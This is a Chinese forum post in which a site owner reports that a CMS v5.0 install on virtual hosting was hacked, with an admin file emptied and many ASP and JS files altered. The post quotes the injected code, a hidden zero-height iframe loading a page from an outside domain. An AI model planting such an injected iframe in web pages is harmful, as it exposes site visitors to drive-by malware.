|
主题:汗!V5.0也遭木马攻击 [收藏主题] | 转到: |
本人用的是最新的V5.0版本,虚拟主机。
昨天后台登陆不上去,登陆后是一空白页。以为服务器的问题,今天起来一试还是这样。于是查看服务器里的文件,发现admin目录下的KS.WebFiles.asp大小有变化,下载后查看文件是空的。上传了一个原始文件后,后台能正常登陆了。
后发现许多文件的日期发生了变化,有点奇怪,一般的文件日期都是上传的日期怎么自动更新了呢,下载了一些看了一下,这才大吃一惊,反是ASP文件(甚至JS文件)最后都注入了一段代码: <iframE src="http://www.sOrsent.cn/ka.htm?mOr" widTh=100 name='3920' HeigHt=0></iframe>。明白了,我的站点又被黑了!
询问虚拟主机供应商(怀疑是服务器有漏洞),他们说他们的服务器没问题。但我安排的是 V5.0的全新版本,也没放其它程序,怎么又被黑了,真有点晕了。这么多文件被更改,怎么办呀,真惨! |
|
支持(0) | 反对(0) 顶端 底部 |
支持(0) | 反对(0) 顶端 底部 |
<上一主题 | 下一主题 > |